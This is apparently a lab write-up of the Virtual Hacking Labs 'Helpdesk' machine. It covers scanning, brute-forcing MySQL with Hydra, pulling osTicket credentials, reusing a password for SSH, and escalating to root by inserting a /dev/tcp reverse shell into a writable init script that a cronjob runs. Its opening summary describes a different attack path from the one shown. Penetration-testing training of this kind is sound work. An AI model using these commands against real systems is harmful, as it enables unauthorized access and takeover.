WriteupsVHL — Helpdesk
WebEasyLinux
VHL — Helpdesk
FTP with anonymous access reveals helpdesk application credentials. SQL injection and file upload lead to remote code execution.
February 10, 2025Virtual Hacking Labs
#FTP#SQLi#File Upload#RCE
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.11
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 18:55 EST
Nmap scan report for 10.11.1.11
Host is up (0.023s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 fd:67:8a:ee:2b:20:1f:c2:7c:40:4a:af:0e:78:a3:f1 (RSA)
| 256 d3:92:02:90:59:6b:ee:05:f4:6e:38:dd:4f:a7:35:b9 (ECDSA)
|_ 256 97:62:5f:74:d9:20:39:f1:bd:9d:2b:56:cf:0e:45:2d (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.29)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.29
|_http-title: Helpdesk
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
3306/tcp open mysql MySQL 5.6.51
| mysql-info:
| Protocol: 10
| Version: 5.6.51
| Thread ID: 505
| Capabilities flags: 63487
| Some Capabilities: LongPassword, ODBCClient, FoundRows, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, SupportsTransactions, SupportsCompression, Support41Auth, DontAllowDatabaseTableColumn, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, Speaks41ProtocolNew, SupportsLoadDataLocal, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: sJUNhBL;!3{7;cb@Y|)S
|_ Auth Plugin Name: mysql_native_password
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 23.14 ms 10.11.1.11
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.66 seconds
21
sh
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status80
sh
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.29)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.29
|_http-title: Helpdesk- cant register need confirmation
rpcclient
sh
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
3306
bruteforcing mysql
sh
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.11.1.11
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-10 19:29:03
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://10.11.1.11:3306/
[3306][mysql] host: 10.11.1.11 login: root password: whatever
creds
root:whatever
mysql
sh
mysql -u root -p'whatever' -h 10.11.1.11sh
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| osticket |
| performance_schema |
+--------------------+
4 rows in set (0.022 sec)sh
MySQL [(none)]> use osticket;sh
Database changed
MySQL [osticket]> show tables;
+--------------------------+
| Tables_in_osticket |
+--------------------------+
| ost__search |
| ost_api_key |
| ost_attachment |
| ost_canned_response |
| ost_config |
| ost_content |
| ost_department |
| ost_draft |
| ost_email |
| ost_email_account |
| ost_email_template |
| ost_email_template_group |
| ost_event |
| ost_faq |
| ost_faq_category |
| ost_faq_topic |
| ost_file |
| ost_file_chunk |
| ost_filter |
| ost_filter_action |
| ost_filter_rule |
| ost_form |
| ost_form_entry |
| ost_form_entry_values |
| ost_form_field |
| ost_group |
| ost_help_topic |
| ost_help_topic_form |
| ost_list |
| ost_list_items |
| ost_lock |
| ost_note |
| ost_organization |
| ost_organization__cdata |
| ost_plugin |
| ost_queue |
| ost_queue_column |
| ost_queue_columns |
| ost_queue_config |
| ost_queue_export |
| ost_queue_sort |
| ost_queue_sorts |
| ost_role |
| ost_schedule |
| ost_schedule_entry |
| ost_sequence |
| ost_session |
| ost_sla |
| ost_staff |
| ost_staff_dept_access |
| ost_syslog |
| ost_task |
| ost_task__cdata |
| ost_team |
| ost_team_member |
| ost_thread |
| ost_thread_collaborator |
| ost_thread_entry |
| ost_thread_entry_email |
| ost_thread_entry_merge |
| ost_thread_event |
| ost_thread_referral |
| ost_ticket |
| ost_ticket__cdata |
| ost_ticket_priority |
| ost_ticket_status |
| ost_translation |
| ost_user |
| ost_user__cdata |
| ost_user_account |
| ost_user_email |
+--------------------------+
71 rows in set (0.019 sec)
sh
MySQL [osticket]> select * from ost_user_email;
+----+---------+-------+------------------------+
| id | user_id | flags | address |
+----+---------+-------+------------------------+
| 1 | 1 | 0 | support@osticket.com |
| 2 | 2 | 0 | helpdesk@localhost.com |
+----+---------+-------+------------------------+sh
MySQL [osticket]> select * from ost_user_account;
+----+---------+--------+----------+------+----------+--------------------------------------------------------------+---------+-------+---------------------+
| id | user_id | status | timezone | lang | username | passwd | backend | extra | registered |
+----+---------+--------+----------+------+----------+--------------------------------------------------------------+---------+-------+---------------------+
| 1 | 2 | 1 | NULL | NULL | NULL | $2a$08$N1NqQ6q6N5o3cXdRSt7p4eGq3UuvEBY04nf7D1ZaK1A9wlALvB4XC | NULL | NULL | 2022-06-07 07:59:41 |
+----+---------+--------+----------+------+----------+--------------------------------------------------------------+---------+-------+---------------------+
1 row in set (0.023 sec)
sh
MySQL [osticket]> select * from ost_staff;
+----------+---------+---------+----------+-----------+----------+--------------------------------------------------------------+---------+------------------------+-------+-----------+--------+-----------+------+----------+--------+-------+----------+---------+-----------+------------+---------------+-----------------------+---------------+---------------+-------------------+------------------------+--------------------+-----------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+---------------------+---------------------+---------------------+
| staff_id | dept_id | role_id | username | firstname | lastname | passwd | backend | email | phone | phone_ext | mobile | signature | lang | timezone | locale | notes | isactive | isadmin | isvisible | onvacation | assigned_only | show_assigned_tickets | change_passwd | max_page_size | auto_refresh_rate | default_signature_type | default_paper_size | extra | permissions | created | lastlogin | passwdreset | updated |
+----------+---------+---------+----------+-----------+----------+--------------------------------------------------------------+---------+------------------------+-------+-----------+--------+-----------+------+----------+--------+-------+----------+---------+-----------+------------+---------------+-----------------------+---------------+---------------+-------------------+------------------------+--------------------+-----------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+---------------------+---------------------+---------------------+
| 1 | 1 | 1 | helpdesk | John | Doe | $2a$08$WLIxqtBatS/omAFsAg2e.uOUckvy44GB/ONx2qpQv3pZx5QmDOrNi | NULL | helpdesk@localhost.com | | NULL | | | NULL | NULL | NULL | NULL | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 25 | 0 | none | Letter | {"browser_lang":"en_US","def_assn_role":true} | {"user.create":1,"user.delete":1,"user.edit":1,"user.manage":1,"user.dir":1,"org.create":1,"org.delete":1,"org.edit":1,"faq.manage":1,"visibility.agents":1,"emails.banlist":1,"visibility.departments":1} | 2022-06-07 04:31:24 | 2022-06-07 04:54:07 | 2022-06-07 11:08:51 | 2022-06-07 04:54:07 |
+----------+---------+---------+----------+-----------+----------+--------------------------------------------------------------+---------+------------------------+-------+-----------+--------+-----------+------+----------+--------+-------+----------+---------+-----------+------------+---------------+-----------------------+---------------+---------------+-------------------+------------------------+--------------------+-----------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+---------------------+---------------------+---------------------+ost_thread_entry
sh
MySQL [osticket]> select * from ost_thread_entry ;
+----+-----+-----------+----------+---------+------+-------+------------------+--------+-------------+--------+---------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------+-------------+-------+--------------------------------------------------+---------------------+---------------------+
| id | pid | thread_id | staff_id | user_id | type | flags | poster | editor | editor_type | source | title | body | format | ip_address | extra | recipients | created | updated |
+----+-----+-----------+----------+---------+------+-------+------------------+--------+-------------+--------+---------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------+-------------+-------+--------------------------------------------------+---------------------+---------------------+
| 1 | 0 | 1 | 0 | 1 | M | 65 | osTicket Support | NULL | NULL | Web | osTicket Installed! | <p>Thank you for choosing osTicket. </p> <p>Please make sure you join the <a href="https://forum.osticket.com">osTicket forums</a> and our <a href="https://osticket.com">mailing list</a> to stay up to date on the latest news, security alerts and updates. The osTicket forums are also a great place to get assistance, guidance, tips, and help from other osTicket users. In addition to the forums, the osTicket wiki provides a useful collection of educational materials, documentation, and notes from the community. We welcome your contributions to the osTicket community. </p> <p>If you are looking for a greater level of support, we provide professional services and commercial support with guaranteed response times, and access to the core development team. We can also help customize osTicket or even add new features to the system to meet your unique needs. </p> <p>If the idea of managing and upgrading this osTicket installation is daunting, you can try osTicket as a hosted service at <a href="https://supportsystem.com">https://supportsystem.com/</a> -- no installation required and we can import your data! With SupportSystem's turnkey infrastructure, you get osTicket at its best, leaving you free to focus on your customers without the burden of making sure the application is stable, maintained, and secure. </p> <p>Cheers, </p> <p>-<br /> osTicket Team https://osticket.com/ </p> <p><strong>PS.</strong> Don't just make customers happy, make happy customers! </p> | html | 192.168.6.1 | NULL | NULL | 2022-06-07 04:31:24 | 0000-00-00 00:00:00 |
| 2 | 0 | 2 | 0 | 2 | M | 577 | helpdesk | NULL | NULL | Phone | NULL | <p>Hi,<br /></p> <p>The following url can be used to access the admin panel: http://10.11.1.11/scp. It will also allow you to enter your system account. Be sure to edit the passwords as soon as you are logged in.<br /></p> <p>Username: helpdesk<br />Password: helpdesk90621<br /></p> <p>Kind regards,<br />Helpdesk administration</p> | html | 192.168.6.1 | NULL | {"to":{"2":"helpdesk <helpdesk@localhost.com>"}} | 2022-06-07 09:09:16 | 0000-00-00 00:00:00 |
+----+-----+-----------+----------+---------+------+-------+------------------+--------+-------------+--------+---------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------+-------------+-------+--------------------------------------------------+---------------------+---------------------+
2 rows in set (0.023 sec)creds
helpdesk:helpdesk90621
password reuse for ssh
sh
ssh helpdesk@10.11.1.11
The authenticity of host '10.11.1.11 (10.11.1.11)' can't be established.
ED25519 key fingerprint is SHA256:Gke21VtlAns2IH9PifDktzL7ttO/vS/IYJuqu9ft1L4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.11.1.11' (ED25519) to the list of known hosts.
helpdesk@10.11.1.11's password: helpdesk90621
[helpdesk@localhost ~]$ whoami
helpdeskpriv esc
sh
[helpdesk@localhost home]$ uanme -a
-bash: uanme: command not found
[helpdesk@localhost home]$ uname -a
Linux localhost.localdomain 3.10.0-1160.66.1.el7.x86_64 #1 SMP Wed May 18 16:02:34 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
[helpdesk@localhost home]$ cat /etc/os-release
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"sh
[helpdesk@localhost ~]$ wget http://172.16.1.1/linpeas.sh
[helpdesk@localhost ~]$ chmod +x linpeas.shlinpeas
sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.10.0-1160.66.1.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-44) (GCC) ) #1 SMP Wed May 18 16:02:34 UTC 2022
lsb_release Not Found
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.23
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/helpdesk/.local/bin:/home/helpdesk/bin
cronjob
sh
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
* * * * * root service help startsh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/make
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
╔══════════╣ MySQL version
mysql Ver 14.14 Distrib 5.6.51, for Linux (x86_64) using EditLine wrappersh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
You have write privileges over /etc/init.d/help
You have write privileges over /etc/rc.d/init.d/help
You have write privileges over /etc/rc.d/init.d/help- edit with vi
/etc/init.d/helpand add a reverse shell
sh
[helpdesk@localhost init.d]$ cat help
#!/bin/bash
#
# /etc/rc.d/init.d/backup
#
# Backup script on start and stop
# To be completed.
#
# chkconfig: 2345 20 80
# Source function library.
. /etc/init.d/functions
start() {
echo "Starting help"
bash -c 'bash -i >& /dev/tcp/172.16.1.1/4444 0>&1'
}
stop() {
echo "Shutting down help"
}
case "$1" in
start)
start
;;
stop)
stop
;;
*)
echo "Usage: <servicename> {start|stop]"
exit 1
;;
esac
exit $?- the cronjob will run every minute and it is invoking the start() function
sh
nc -lnvp 4444
listening on [any] 4444 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.11] 48650
bash: no job control in this shell
[root@localhost /]# whoami
whoami
root
[root@localhost /]# cat /root/key.txt
cat /root/key.txt
93jksdf8ujklfadki32k
[root@localhost /]# date
date
Mon Feb 10 21:36:52 EST 2025
Up next
EasyFeb 2025
VHL — Steven
Wing FTP Server on Windows. Default admin credentials allow access to the web admin panel, leading to command execution via scheduled tasks.
Read writeup
MediumFeb 2025
VHL — Records
OpenEMR medical records application. Exploited a pre-auth SQL injection CVE and file upload for shell access.
Read writeup
MediumFeb 2025
VHL — CMS02
Drupal 8 on CentOS. Exploited Drupalgeddon2 (CVE-2018-7600) for unauthenticated RCE and escalated privileges via SUID binary.
Read writeup